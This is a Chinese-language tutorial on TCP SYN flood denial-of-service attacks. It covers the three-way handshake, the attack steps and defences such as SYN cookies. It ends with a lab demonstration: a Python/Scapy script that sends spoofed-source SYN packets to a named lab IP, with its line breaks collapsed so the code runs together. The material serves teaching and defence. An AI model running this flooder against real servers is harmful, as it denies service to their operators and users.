一、介绍

TCP SYN 洪水攻击是一种拒绝服务攻击（Denial-of-Service, DoS）类型，攻击者通过向目标服务器发送大量的伪造TCP连接请求（SYN包），消耗目标服务器的资源，导致其无法处理合法用户的请求。

1.1 TCP三次握手

在理解TCP SYN洪水攻击之前，首先需要了解TCP三次握手的过程：

1. SYN：客户端向服务器发送一个SYN（synchronize）包，请求建立连接。
2. SYN-ACK：服务器接收到SYN包后，向客户端发送一个SYN-ACK包，表示同意建立连接。
3. ACK：客户端接收到SYN-ACK包后，向服务器发送一个ACK包，确认连接建立。

在TCP SYN洪水攻击中，攻击者利用这个过程，通过发送大量的SYN包，但不完成三次握手，导致服务器资源被大量未完成的连接占用。

1.2 攻击步骤

1. 发送大量SYN包：攻击者向目标服务器发送大量的伪造SYN包。
2. 占用服务器资源：服务器为每个SYN包分配资源，并发送SYN-ACK包等待客户端的ACK包。
3. 消耗连接表：由于客户端不会发送最终的ACK包，这些半连接状态会一直存在，直到超时。这会导致服务器的连接表被填满，从而无法处理新的合法连接请求。

1.3 防御措施

1. SYN Cookie：启用SYN Cookie功能，通过在SYN-ACK响应中包含一个加密的cookie来验证客户端的ACK包，而不需要在服务器上维护状态。
2. 连接超时调整：减小SYN-ACK等待ACK包的超时时间，减少未完成连接的存留时间。
3. 限制并发连接：使用防火墙或负载均衡器限制每个IP地址的并发连接数，以防止单一IP地址的滥用。
4. 入侵检测系统：部署入侵检测和防御系统（IDS/IPS），实时检测和阻止异常流量。
5. 黑名单：检测到攻击后，将恶意IP地址加入黑名单，阻止其继续发送请求。

通过以上防御措施，可以有效减缓或防止TCP SYN洪水攻击对目标服务器造成的影响，确保网络服务的可用性和稳定性。

二、实验环境

受害者：192.168.134.148

三、实操演示

以下是一个使用Python和Scapy库构造并发送大量SYN包的示例代码：

from scapy.all import *
import random
from scapy.layers.inet import TCPdef syn_flood(target_ip, target_port, count):for _ in range(count):# 生成随机源IP和源端口src_ip = ".".join(map(str, (random.randint(0, 255) for _ in range(4))))src_port = random.randint(1024, 65535)# 构造IP和TCP头部ip = IP(src=src_ip, dst=target_ip)tcp = TCP(sport=src_port, dport=target_port, flags="S", seq=random.randint(1000, 9000))# 发送SYN包send(ip / tcp, verbose=0)print(f"Sent SYN packet from {src_ip}:{src_port} to {target_ip}:{target_port}")if __name__ == "__main__":target_ip = "192.168.134.148"  # 目标服务器的IP地址target_port = 8080  # 目标服务器的端口count = 1000  # 要发送的SYN包数量syn_flood(target_ip, target_port, count)